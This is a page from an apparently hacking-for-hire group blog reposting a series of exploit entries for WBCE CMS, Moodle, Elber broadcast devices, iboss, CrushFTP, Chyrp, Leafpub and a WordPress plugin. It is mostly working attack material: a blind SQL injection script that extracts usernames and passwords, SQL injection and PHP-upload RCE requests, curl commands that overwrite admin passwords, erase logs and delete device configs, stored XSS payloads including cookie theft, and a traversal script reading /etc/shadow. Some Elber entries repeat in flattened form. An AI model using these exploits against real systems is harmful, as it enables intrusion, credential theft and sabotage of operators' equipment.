Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108953

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023 
# Exploit Author: young pope 
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS 
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip 
# Version: 1.6.0 
# Tested on: Kali linux 
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a 
default module installed in the *WBCE* cms. It is an unauthenticated 
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no 
authentication check. On line |40| in this file, there is a |DELETE| 
query that is vulnerable, an attacker could jump from the query using 
tick sign - ```.

Function |addslashes()| 
(https://www.php.net/manual/en/function.addslashes.php) escapes only 
these characters and not a tick sign:

  * single quote (')
  * double quote (")
  * backslash ()
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
  * https://pastebin.com/PBw5AvGp
HireHackking 
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Google Dork: 
# Date: 04/11/2023
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link: 
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393

import requests
import string
from termcolor import colored

# Request details
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Content-Type": "application/json",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
    "Origin": "http://127.0.0.1:8080",
    "Referer": "http://127.0.0.1:8080/moodle/my/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9",
    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
    "Connection": "close"
}

# Characters to test
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"

def test_character(payload):
    response = requests.post(URL, headers=HEADERS, json=[payload])
    return response.elapsed.total_seconds() >= 3

def extract_value(column, label):
    base_payload = {
        "index": 0,
        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",
        "args": {
            "offset": 0,
            "limit": 0,
            "classification": "all",
            "sort": "",
            "customfieldname": "",
            "customfieldvalue": ""
        }
    }

    result = ""
    for _ in range(50):  # Assumes a maximum of 50 characters for the value
        character_found = False
        for character in characters_to_test:
            if column == "database()":
                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
            else:
                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
            
            if test_character(base_payload):
                result += character
                print(colored(f"{label}: {result}", 'red'), end="\r")
                character_found = True
                break

        if not character_found:
            break

    # Print the final result
    print(colored(f"{label}: {result}", 'red'))

if __name__ == "__main__":
    extract_value("database()", "Database")
    extract_value("username", "Username")
    extract_value("password", "Password")
HireHackking 
# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution
# Date: 30/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
# Version: 1.6.1
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
Content-Length: 522
Origin: https://demos6.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="submit"


-----------------------------86020911415982314764024459--

### Response : 

<!-- ################### Up from here: Original Code from original template ########### -->

<!-- senseless positioning-table: needed for old modules which base on class td.content -->
<div class="row" style="overflow:visible">
<div class="fg12">
<table id="former_positioning_table">
<tr>
    <td class="content">
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
    <div class="top alertbox_error fg12 error-box">
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>
        
                    <p><a href="index.php" class="button">Back
HireHackking 
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, it’s possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5815
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
HireHackking
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it’s possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5814 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
HireHackking
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5817 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.
HireHackking
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a basic chassis with 4 extractable boards which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has brought to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing Transmitter, Receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band). Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5818 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
HireHackking

iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) # Date: 4/4/2024 # Exploit Author: modrnProph3t # Vendor Homepage: https://www.iboss.com # Version: < 10.2.0 # CVE-2024-3378 # Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md ## Description A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload. This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included. ## Proof of Conept 1. Access the login portal located at /login 2. Submit login attempt and intercept the request Example of unaltered request: ``` POST /user_login_submit HTTP/1.1 Host: <domain> <--Headers Removed--> userName=TEST&x=TEST&action=login&redirectUrl= ``` 3. Insert XSS payload into the "redirectUrl" parameter Example of request with inserted payload: ``` POST /user_login_submit HTTP/1.1 Host: <domain> <--Headers Removed--> userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script> ``` 4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution
HireHackking

CrushFTP < 11.1.0 - Directory Traversal

HACKER · %s · %s

## Exploit Title: CrushFTP Directory Traversal ## Google Dork: N/A # Date: 2024-04-30 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) ## Vendor Homepage: https://www.crushftp.com/ ## Software Link: https://www.crushftp.com/download/ ## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x) ## Tested on: Windows10 import requests import re # Regular expression to validate the URL def is_valid_url(url): regex = re.compile( r'^(?:http|ftp)s?://' # http:// or https:// r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4 r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6 r'(?::\d+)?' # optional: port r'(?:/?|[/?]\S+)$', re.IGNORECASE) return re.match(regex, url) is not None # Function to scan for the vulnerability def scan_for_vulnerability(url, target_files): print("Scanning for vulnerability in the following files:") for target_file in target_files: print(target_file) for target_file in target_files: try: response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10) if response.status_code == 200 and target_file.split('/')[-1] in response.text: print("vulnerability detected in file", target_file) print("Content of file", target_file, ":") print(response.text) else: print("vulnerability not detected or unexpected response for file", target_file) except requests.exceptions.RequestException as e: print("Error connecting to the server:", e) # User input input_url = input("Enter the URL of the CrushFTP server: ") # Validate the URL if is_valid_url(input_url): # Expanded list of allowed files target_files = [ "/var/www/html/index.php", "/var/www/html/wp-config.php", "/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/ssh/sshd_config", "/etc/mysql/my.cnf", # Add more files as needed ] # Start the scan scan_for_vulnerability(input_url, target_files) else: print("Invalid URL entered. Please enter a valid URL.")
HireHackking

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/chyrp/ # Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip # Version: 2.5.2 # Tested on: MacOS ### Steps to Reproduce ### - Login from the address: http://localhost/chyrp/?action=login. - Click on 'Write'. - Type this payload into the 'Title' field: "><img src=x onerror=alert( "Stored")> - Fill in the 'Body' area and click 'Publish'. - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /chyrp/admin/?action=add_post HTTP/1.1 Host: localhost Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp, */*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598 Content-Length: 1194 Origin: http://localhost Referer: http://localhost/chyrp/admin/?action=write_post Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="title" "><img src=x onerror=alert("Stored")> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="body" <p>1337</p> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="status" public -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="slug" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="created_at" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="original_time" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="trackbacks" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="feather" text -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="hash" 11e11aba15114f918ec1c2e6b8f8ddcf -----------------------------28307567523233313132815561598--
HireHackking

Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/Leafpub # Software Link: https://github.com/Leafpub/leafpub # Version: 1.1.9 # Tested on: MacOS ### Steps to Reproduce ### - Please login from this address: http://localhost/leafpub/admin/login - Click on the Settings > Advanced - Enter the following payload into the "Custom Code" area and save it: ("><img src=x onerror=alert("Stored")>) - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /leafpub/api/settings HTTP/1.1 Host: localhost Cookie: authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 476 Origin: http://localhost Referer: http://localhost/leafpub/admin/settings Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
HireHackking
# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) # Date: 12 April 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.1.1 # Proof Of Concept: 1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". # PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w # Vulnerable Property at Request: videoFields[post_type] # Payload: <script>alert(document.cookie)</script> # Request: POST /wp-admin/options.php HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 395 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes
HireHackking
